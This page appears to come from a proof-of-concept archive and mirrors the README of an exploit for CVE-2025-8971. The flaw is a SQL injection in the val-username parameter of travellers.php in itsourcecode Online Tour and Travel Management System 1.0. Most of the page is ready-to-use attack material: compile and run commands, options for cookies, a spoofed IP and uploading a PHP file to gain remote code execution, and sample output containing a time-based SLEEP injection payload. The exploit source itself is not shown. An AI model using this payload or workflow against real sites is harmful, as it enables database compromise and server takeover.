关联漏洞
Description
Sql injection in itsourcecode Online Tour and Travel Management System 1.0.
介绍
# CVE-2025-8971 (SQL Injection)
**Author: Byte Reaper**
## Description :
This exploit for CVE-2025-8971, a SQL injection vulnerability in itsourcecode Online Tour and Travel Management System 1.0.
The vulnerability exists in /admin/operations/travellers.php and can be exploited remotely via the val-username parameter.
How It Works
The exploit sends crafted HTTP POST requests to the target URL.
Payloads are encoded and injected into val-username.
Optional file upload (.php or image) can be used to achieve remote code execution.
The script verifies responses to check if the payload was successfully executed.
## Requirements :
```
GCC compiler (gcc)
Linux x86_64
ibcurl
```
## Compilation :
```
gcc script.c argparse.c -o CVE-2025-8971 -lcurl
./CVE-2025-8971 -u http://<target> -v [verbose mode]
```
## Usage:
```
-h, --help help message
-u, --url Target Url (BASE URL)
-c, --cookies File cookies
-i, --ip Fake Ip (Host request)
-f, --file File upload (.php / image)
-v, --verbose Verbose Mode
```
## Example Run :
```
[+] Start encode Payload in Request (username=)
[+] Encode Payload : AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))bAKL)%20AND%20'b'='b'
[+] Original Payload (Not encode) : AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'b'='b'
[+] POST Request Sent
[+] FULL URL : http://127.0.0.1/code/admin/operations/travellers.php
[+] File Upload : test.php
[+] File written successfully
....
```
## License :
MIT License
文件快照
[4.0K] /data/pocs/59f823a95b8acadb28e89d6196d8996905920790
├── [1.0K] LICENSE
├── [1.6K] README.md
└── [ 24K] script.c
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。